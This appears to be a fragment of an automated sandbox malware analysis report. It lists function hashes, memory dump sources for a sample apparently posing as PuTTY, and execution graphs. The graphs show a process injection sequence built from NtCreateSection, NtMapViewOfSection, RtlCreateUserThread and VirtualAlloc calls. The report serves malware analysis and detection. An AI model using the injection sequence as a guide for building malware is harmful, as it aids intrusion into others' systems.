                                                                                                  • Opcode ID: b859de65e3e4eca09ea0fa0fd0a149a7b7b601be189d05055e302c384b2899de
                                                                                                  • Instruction ID: 66a051fc3b1640109372302853407978bf892c336f6e5febd052736601f380b8
                                                                                                  • Opcode Fuzzy Hash: b859de65e3e4eca09ea0fa0fd0a149a7b7b601be189d05055e302c384b2899de
                                                                                                  • Instruction Fuzzy Hash: DBF04FB6208244EBDB006AD1CC51EAE33699B49364F304173B613790F5D67C8653E72F
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239067945.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_40b000_putty.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___getlocaleinfo
                                                                                                  • String ID:
                                                                                                  • API String ID: 1937885557-0
                                                                                                  • Opcode ID: 08a5706dd36f95cb33eb1fd19b6180d9160690d7207ff98e0d0a3bb732afdc1e
                                                                                                  • Instruction ID: 88e971658578b68865164239707bd76bcf5248923822aacfc0123a1835a67747
                                                                                                  • Opcode Fuzzy Hash: 08a5706dd36f95cb33eb1fd19b6180d9160690d7207ff98e0d0a3bb732afdc1e
                                                                                                  • Instruction Fuzzy Hash: 17E101B390020DBEEF11DAE2CC85EFF77BDEB5474CF00092AB215D2050EA78AA459764
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239346704.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_6d0000_putty.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .$GetProcAddress.$l
                                                                                                  • API String ID: 0-2784972518
                                                                                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                  • Instruction ID: 02a7c1c9479bda2ee6bb9274ee97bbc21b000f9cf9760b50e26de53d043e0b6c
                                                                                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                  • Instruction Fuzzy Hash: 1E3117B6900609DFEB10CF99C880BAEBBF6FF48324F25504AD441AB351D771EA45CBA4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239261367.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_550000_putty.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                  • Instruction ID: d5ccb1bd5b4ffc28a0aa7365e609a1d35973e4558f338a6c0f6558440a25b044
                                                                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                  • Instruction Fuzzy Hash: AC119A72340500AFD704CF59DCC1EA277EAFB89320B2D8065E904CB316E675E802C764
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239026919.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_400000_putty.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0451e9d16359af643799e3b23a0685e127db626760f30cb9f61b7ea239eb6fd6
                                                                                                  • Instruction ID: b4d99e39562e0a8d34f4e8a2adcb899dff0217260de8cdfa4497104cdd6e8b78
                                                                                                  • Opcode Fuzzy Hash: 0451e9d16359af643799e3b23a0685e127db626760f30cb9f61b7ea239eb6fd6
                                                                                                  • Instruction Fuzzy Hash: 7A117A22B1C21196E3179A918A460A97710DB11360B74C87BD493BB8F3C27D98066BCB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239026919.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_400000_putty.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7431593d3acf0a61d97152af6e57b32ce30d2b428f4d380d733201fdbbf0ad36
                                                                                                  • Instruction ID: 9c1a6264578523f2b95dbae5c8345fb03cc7a3f7f5b051fb9d7a91e089220ce3
                                                                                                  • Opcode Fuzzy Hash: 7431593d3acf0a61d97152af6e57b32ce30d2b428f4d380d733201fdbbf0ad36
                                                                                                  • Instruction Fuzzy Hash: 06118C27A1C20096E3179A90C6461A5B760DB12360B74887BD493778F3D17D58065BCF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239026919.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_400000_putty.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4ead3596dcdc828a5c4cfb9b817dc4ff7884f70c04ac3703ba61ef413fca77a8
                                                                                                  • Instruction ID: 7cced9f7fdb1c3f7b009c6269bf5343d8ea2104f00e9896e504acad3335f8aa1
                                                                                                  • Opcode Fuzzy Hash: 4ead3596dcdc828a5c4cfb9b817dc4ff7884f70c04ac3703ba61ef413fca77a8
                                                                                                  • Instruction Fuzzy Hash: 1811AB23F1C20056E3179F91C6460A8B760DB12360B748C7FD4826B8F7D27D98129BCB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239026919.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_400000_putty.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 862da947cf69c9b5c573b7de815aaadc364d2e787700889f4836839734fe5098
                                                                                                  • Instruction ID: 5938fd262c6d7fd7e9059b2c6d5fc66a7b7b37341f859f3ef56555a79cfd23f8
                                                                                                  • Opcode Fuzzy Hash: 862da947cf69c9b5c573b7de815aaadc364d2e787700889f4836839734fe5098
                                                                                                  • Instruction Fuzzy Hash: 0401AB33F1C20056E3179AA0C6860A9B760DB12360B74887BD482678F3D23D98025BCF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239026919.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_400000_putty.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c0e11a3ef683fd68855c3224d2ea3fecd6130d6e756cf9f75479bdcd47c53b27
                                                                                                  • Instruction ID: 34643119912da5106e2d45a94dd8d32290489c90b68d507143b233416c26121d
                                                                                                  • Opcode Fuzzy Hash: c0e11a3ef683fd68855c3224d2ea3fecd6130d6e756cf9f75479bdcd47c53b27
                                                                                                  • Instruction Fuzzy Hash: A101BD23F2821055D71B9BA0C6860E8BB20DA12360B7489BBD052778F3D23C94028BCD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239346704.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_6d0000_putty.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                  • Instruction ID: 7b34b00db03c437a671a5b77b6dbaefec700ec5df5ee9cfbb4f3523ba37fa3a2
                                                                                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                  • Instruction Fuzzy Hash: 5501A776E006048FEF21CF64C804BEA33F7EF85315F4544EAD50697342E774A9418B90
                                                                                                  APIs
                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239026919.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_400000_putty.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateDuplicateObjectSection
                                                                                                  • String ID:
                                                                                                  • API String ID: 3132048701-0
                                                                                                  • Opcode ID: 26b7c8141964b859a8c9d37ffff58683f7c78d268340d9480a59f47ab8784a65
                                                                                                  • Instruction ID: 94d0d6187efa1b4f5fb96639de9bee4adb18fcc7c1e699108f742e7c63bf3b1b
                                                                                                  • Opcode Fuzzy Hash: 26b7c8141964b859a8c9d37ffff58683f7c78d268340d9480a59f47ab8784a65
                                                                                                  • Instruction Fuzzy Hash: FF019953F2D64126D72B9FA086460D9BB20E9133B07748DBFD4A267CF7C274941487C9
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239067945.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_40b000_putty.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _memset$___ansicp___convertcp_malloc
                                                                                                  • String ID: 1BA
                                                                                                  • API String ID: 182381717-427559476
                                                                                                  • Opcode ID: 1a9c0c095cd4ebbc7412376d92f8ab6fbe77295eb3f3c08220bdd1022898e340
                                                                                                  • Instruction ID: c477a1a75e98c9aee6368b68bfaa6e784f79f85bafb577a3b4888ecfb962d632
                                                                                                  • Opcode Fuzzy Hash: 1a9c0c095cd4ebbc7412376d92f8ab6fbe77295eb3f3c08220bdd1022898e340
                                                                                                  • Instruction Fuzzy Hash: 7051BE7550011AFFDB109FA5DC859EF3BA9EB98354B20453AFA04D7260D738CDE18B98
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239067945.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_40b000_putty.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __lock$__crt_waiting_on_module_handle
                                                                                                  • String ID: x$@
                                                                                                  • API String ID: 946058739-580337868
                                                                                                  • Opcode ID: fc4670a47f3632b01b16caf735d8ff3ab22c7296ea4dd8459bfb17ea7d2a7ba1
                                                                                                  • Instruction ID: f8475ee44d53d994f5b99ace5135e8e36cb9c777021c500f84fce444b4195f36
                                                                                                  • Opcode Fuzzy Hash: fc4670a47f3632b01b16caf735d8ff3ab22c7296ea4dd8459bfb17ea7d2a7ba1
                                                                                                  • Instruction Fuzzy Hash: 7A119071940741EEE720AF769945B4ABBE0AF04318F10853FE4A9B72E1CB78A945CF5C
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.2239067945.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_40b000_putty.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                  • String ID:
                                                                                                  • API String ID: 3016257755-0
                                                                                                  • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                  • Instruction ID: 81a52edbc7f04b0b3beaf306ef0248834585fa557240606b8da63e4de76e0855
                                                                                                  • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                  • Instruction Fuzzy Hash: 5C117E3640054EBBCF135E84CC018EE3F22BB19354B18845AFE1859131CB3AC9B2EB89

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:4.3%
                                                                                                  Dynamic/Decrypted Code Coverage:96.9%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:65
                                                                                                  Total number of Limit Nodes:3
                                                                                                  execution_graph 10671 402e51 10672 402e44 10671->10672 10674 402ef2 10672->10674 10675 401891 10672->10675 10676 4018a1 10675->10676 10677 4018da Sleep 10676->10677 10682 4013bf 10677->10682 10679 4018f5 10681 401906 10679->10681 10694 4014b5 10679->10694 10681->10674 10683 4013d0 10682->10683 10684 401564 NtDuplicateObject 10683->10684 10691 401478 10683->10691 10685 401581 NtCreateSection 10684->10685 10684->10691 10686 401601 NtCreateSection 10685->10686 10687 4015a7 NtMapViewOfSection 10685->10687 10688 40162d 10686->10688 10686->10691 10687->10686 10689 4015ca NtMapViewOfSection 10687->10689 10690 401637 NtMapViewOfSection 10688->10690 10688->10691 10689->10686 10692 4015e8 10689->10692 10690->10691 10693 40165e NtMapViewOfSection 10690->10693 10691->10679 10692->10686 10693->10691 10695 4014c6 10694->10695 10696 401564 NtDuplicateObject 10695->10696 10703 401680 10695->10703 10697 401581 NtCreateSection 10696->10697 10696->10703 10698 401601 NtCreateSection 10697->10698 10699 4015a7 NtMapViewOfSection 10697->10699 10700 40162d 10698->10700 10698->10703 10699->10698 10701 4015ca NtMapViewOfSection 10699->10701 10702 401637 NtMapViewOfSection 10700->10702 10700->10703 10701->10698 10704 4015e8 10701->10704 10702->10703 10705 40165e NtMapViewOfSection 10702->10705 10703->10681 10704->10698 10705->10703 10706 40c3b1 HeapCreate 10707 40c3d5 10706->10707 10708 551606 10711 551617 10708->10711 10712 551626 10711->10712 10715 551db7 10712->10715 10718 551dd2 10715->10718 10716 551ddb CreateToolhelp32Snapshot 10717 551df7 Module32First 10716->10717 10716->10718 10719 551e06 10717->10719 10720 551616 10717->10720 10718->10716 10718->10717 10722 551a76 10719->10722 10723 551aa1 10722->10723 10724 551ab2 VirtualAlloc 10723->10724 10725 551aea 10723->10725 10724->10725 10726 61003c 10727 610049 10726->10727 10739 610e0f SetErrorMode SetErrorMode 10727->10739 10732 610265 10733 6102ce VirtualProtect 10732->10733 10735 61030b 10733->10735 10734 610439 VirtualFree 10737 6104be LoadLibraryA 10734->10737 10735->10734 10738 6108c7 10737->10738 10740 610223 10739->10740 10741 610d90 10740->10741 10742 610dad 10741->10742 10743 610dbb GetPEB 10742->10743 10744 610238 VirtualAlloc 10742->10744 10743->10744 10744->10732 10745 402f8f 10746 4030d2 10745->10746 10747 402fb9 10745->10747 10747->10746 10748 403074 RtlCreateUserThread NtTerminateProcess 10747->10748 10748->10746

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 85 4013bf-4013c8 86 4013d0-4013d6 85->86 87 4013da 85->87 88 4013dd-401422 call 40113b 86->88 87->86 87->88 98 401424-401440 88->98 99 401496-40149e 88->99 100 401442 98->100 101 4014b7-4014d5 98->101 102 4014a0-4014b2 99->102 103 401492-401494 100->103 104 401444-401446 100->104 107 4014c6-4014e9 101->107 104->102 106 401448-401461 104->106 111 401463-401468 106->111 112 4014c4 106->112 113 4014e0-4014e4 107->113 114 4014e5-40150e call 40113b 111->114 115 40146a 111->115 112->107 113->114 126 401510 114->126 127 401513-401518 114->127 117 40146c-401476 115->117 118 4014de 115->118 120 401414-401422 117->120 121 401478-40147c 117->121 118->113 120->98 120->99 126->127 129 40183d-401845 127->129 130 40151e-40152f 127->130 129->127 133 401535-40155e 130->133 134 40183b-40184a 130->134 133->134 143 401564-40157b NtDuplicateObject 133->143 137 401861 134->137 138 401852-40185d 134->138 137->138 139 401864-40188e call 40113b 137->139 138->139 143->134 145 401581-4015a5 NtCreateSection 143->145 147 401601-401627 NtCreateSection 145->147 148 4015a7-4015c8 NtMapViewOfSection 145->148 147->134 149 40162d-401631 147->149 148->147 151 4015ca-4015e6 NtMapViewOfSection 148->151 149->134 152 401637-401658 NtMapViewOfSection 149->152 151->147 154 4015e8-4015fe 151->154 152->134 155 40165e-40167a NtMapViewOfSection 152->155 154->147 155->134 157 401680 call 401685 155->157 157->134
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2473410424.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_400000_ddhfdfu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f1a6a853dab4f549cc320576fe09db09b07e35a282cbb1e4dab32455e86f95e0
                                                                                                  • Instruction ID: b303ee40ce3cd715bffe5459f1355022e0f5cf8d3c2eb96fe6471530370b2b0e
                                                                                                  • Opcode Fuzzy Hash: f1a6a853dab4f549cc320576fe09db09b07e35a282cbb1e4dab32455e86f95e0
                                                                                                  • Instruction Fuzzy Hash: 3BA10872A04204FBEB219F91CC45EEB7BB8EF81710F24452BF902BA1F1D6749902DB65

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 161 4014b5-4014be 162 4014d5 161->162 163 4014c6-40150e call 40113b 161->163 162->163 174 401510 163->174 175 401513-401518 163->175 174->175 177 40183d-401845 175->177 178 40151e-40152f 175->178 177->175 181 401535-40155e 178->181 182 40183b-40184a 178->182 181->182 191 401564-40157b NtDuplicateObject 181->191 185 401861 182->185 186 401852-40185d 182->186 185->186 187 401864-40188e call 40113b 185->187 186->187 191->182 193 401581-4015a5 NtCreateSection 191->193 195 401601-401627 NtCreateSection 193->195 196 4015a7-4015c8 NtMapViewOfSection 193->196 195->182 197 40162d-401631 195->197 196->195 199 4015ca-4015e6 NtMapViewOfSection 196->199 197->182 200 401637-401658 NtMapViewOfSection 197->200 199->195 202 4015e8-4015fe 199->202 200->182 203 40165e-40167a NtMapViewOfSection 200->203 202->195 203->182 205 401680 call 401685 203->205 205->182
                                                                                                  APIs
                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015E1
                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401622
                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401653
                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401675
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2473410424.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_400000_ddhfdfu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                  • String ID:
                                                                                                  • API String ID: 1546783058-0
                                                                                                  • Opcode ID: 719849d05dd569a84f102b076dd352e16165c28b1771b30273656c5f16ef7e6e
                                                                                                  • Instruction ID: 19a1d6b0ff796e10bf8f41dee95350edbff68fa9ff5f9bfea876b5d94b6971b3
                                                                                                  • Opcode Fuzzy Hash: 719849d05dd569a84f102b076dd352e16165c28b1771b30273656c5f16ef7e6e
                                                                                                  • Instruction Fuzzy Hash: C9513BB1900245BFEB209F91CC48FAB7BB8FF85B10F14412AFA11BA2E5D6759941CB64

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 209 4014d3-4014eb 211 4014d8-4014f8 209->211 212 4014ed 209->212 214 4014f1-40150e call 40113b 211->214 212->214 222 401510 214->222 223 401513-401518 214->223 222->223 225 40183d-401845 223->225 226 40151e-40152f 223->226 225->223 229 401535-40155e 226->229 230 40183b-40184a 226->230 229->230 239 401564-40157b NtDuplicateObject 229->239 233 401861 230->233 234 401852-40185d 230->234 233->234 235 401864-40188e call 40113b 233->235 234->235 239->230 241 401581-4015a5 NtCreateSection 239->241 243 401601-401627 NtCreateSection 241->243 244 4015a7-4015c8 NtMapViewOfSection 241->244 243->230 245 40162d-401631 243->245 244->243 247 4015ca-4015e6 NtMapViewOfSection 244->247 245->230 248 401637-401658 NtMapViewOfSection 245->248 247->243 250 4015e8-4015fe 247->250 248->230 251 40165e-40167a NtMapViewOfSection 248->251 250->243 251->230 253 401680 call 401685 251->253 253->230
                                                                                                  APIs
                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2473410424.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_400000_ddhfdfu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Section$CreateDuplicateObjectView
                                                                                                  • String ID:
                                                                                                  • API String ID: 1652636561-0
                                                                                                  • Opcode ID: b37d7a3f5bcaad5f7e116b16f8babae0ae157dca3b6d02a9ae2d42698eee0e78
                                                                                                  • Instruction ID: 8103355e2e942ff69e8c14b284ac6daeef9955d1bae1450e847efa7766c746d9
                                                                                                  • Opcode Fuzzy Hash: b37d7a3f5bcaad5f7e116b16f8babae0ae157dca3b6d02a9ae2d42698eee0e78
                                                                                                  • Instruction Fuzzy Hash: 245127B1900245BBEF209F91CC48FABBBB8EF86B00F144159FA11BA2A5D6719941CB24

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 257 4014f7-40150e call 40113b 261 401510 257->261 262 401513-401518 257->262 261->262 264 40183d-401845 262->264 265 40151e-40152f 262->265 264->262 268 401535-40155e 265->268 269 40183b-40184a 265->269 268->269 278 401564-40157b NtDuplicateObject 268->278 272 401861 269->272 273 401852-40185d 269->273 272->273 274 401864-40188e call 40113b 272->274 273->274 278->269 280 401581-4015a5 NtCreateSection 278->280 282 401601-401627 NtCreateSection 280->282 283 4015a7-4015c8 NtMapViewOfSection 280->283 282->269 284 40162d-401631 282->284 283->282 286 4015ca-4015e6 NtMapViewOfSection 283->286 284->269 287 401637-401658 NtMapViewOfSection 284->287 286->282 289 4015e8-4015fe 286->289 287->269 290 40165e-40167a NtMapViewOfSection 287->290 289->282 290->269 292 401680 call 401685 290->292 292->269
                                                                                                  APIs
                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015E1
                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401622
                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401653
                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401675
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2473410424.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_400000_ddhfdfu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                  • String ID:
                                                                                                  • API String ID: 1546783058-0
                                                                                                  • Opcode ID: f4d7e0ef1ba092f52e3f3aa053b09444c5da80675db222bfe35b70c903d8b2e5
                                                                                                  • Instruction ID: 2227e086d9928dda04f460d80950503c889386f6503bf0ca9f5f85cfbacfc3af
                                                                                                  • Opcode Fuzzy Hash: f4d7e0ef1ba092f52e3f3aa053b09444c5da80675db222bfe35b70c903d8b2e5
                                                                                                  • Instruction Fuzzy Hash: 8B5107B1900249BFEF209F91CC48FAFBBB8EF85B10F144159FA11BA2A5D6719945CB24

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 296 402f8f-402fb3 297 4030d2-4030d7 296->297 298 402fb9-402fd1 296->298 298->297 299 402fd7-402fe8 298->299 300 402fea-402ff3 299->300 301 402ff8-403006 300->301 301->301 302 403008-40300f 301->302 303 403031-403038 302->303 304 403011-403030 302->304 305 40305a-40305d 303->305 306 40303a-403059 303->306 304->303 307 403066 305->307 308 40305f-403062 305->308 306->305 307->300 310 403068-40306d 307->310 308->307 309 403064 308->309 309->310 310->297 311 40306f-403072 310->311 311->297 312 403074-4030cf RtlCreateUserThread NtTerminateProcess 311->312 312->297
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2473410424.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_400000_ddhfdfu.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcessTerminateThreadUser
                                                                                                  • String ID:
                                                                                                  • API String ID: 1921587553-0
                                                                                                  • Opcode ID: 3666794f6f76943507f515948c416729d2a122008cd61b3dc3cfc1699990bb7a
                                                                                                  • Instruction ID: aa2530698c6aa4494656ae1f9c01ee64b6dc24c6198c14284b052c109098bfb9
                                                                                                  • Opcode Fuzzy Hash: 3666794f6f76943507f515948c416729d2a122008cd61b3dc3cfc1699990bb7a
                                                                                                  • Instruction Fuzzy Hash: 1F415832618E0C4FD778EE6CA88966377D5E794351B56437AE809D3388EE30DC5183C5

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 61003c-610047 1 610049 0->1 2 61004c-610263 call 610a3f call 610e0f call 610d90 VirtualAlloc 0->2 1->2 17 610265-610289 call 610a69 2->17 18 61028b-610292 2->18 23 6102ce-6103c2 VirtualProtect call 610cce call 610ce7 17->23 20 6102a1-6102b0 18->20 22 6102b2-6102cc 20->22 20->23 22->20 29 6103d1-6103e0 23->29 30 6103e2-610437 call 610ce7 29->30 31 610439-6104b8 VirtualFree 29->31 30->29 33 6105f4-6105fe 31->33 34 6104be-6104cd 31->34 37 610604-61060d 33->37 38 61077f-610789 33->38 36 6104d3-6104dd 34->36 36->33 41 6104e3-610505 36->41 37->38 39 610613-610637 37->39 42 6107a6-6107b0 38->42 43 61078b-6107a3 38->43 44 61063e-610648 39->44 54 610517-610520 41->54 55 610507-610515 41->55 45 6107b6-6107cb 42->45 46 61086e-6108be LoadLibraryA 42->46 43->42 44->38 48 61064e-61065a 44->48 47 6107d2-6107d5 45->47 53 6108c7-6108f9 46->53 50 610824-610833 47->50 51 6107d7-6107e0 47->51 48->38 52 610660-61066a 48->52 60 610839-61083c 50->60 57 6107e2 51->57 58 6107e4-610822 51->58 59 61067a-610689 52->59 61 610902-61091d 53->61 62 6108fb-610901 53->62 56 610526-610547 54->56 55->56 63 61054d-610550 56->63 57->50 58->47 64 610750-61077a 59->64 65 61068f-6106b2 59->65 60->46 66 61083e-610847 60->66 62->61 68 6105e0-6105ef 63->68 69 610556-61056b 63->69 64->44 70 6106b4-6106ed 65->70 71 6106ef-6106fc 65->71 72 610849 66->72 73 61084b-61086c 66->73 68->36 74 61056d 69->74 75 61056f-61057a 69->75 70->71 76 61074b 71->76 77 6106fe-610748 71->77 72->46 73->60 74->68 78 61059b-6105bb 75->78 79 61057c-610599 75->79 76->59 77->76 84 6105bd-6105db 78->84 79->84 84->63
                                                                                                  APIs
                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0061024D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2474059930.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
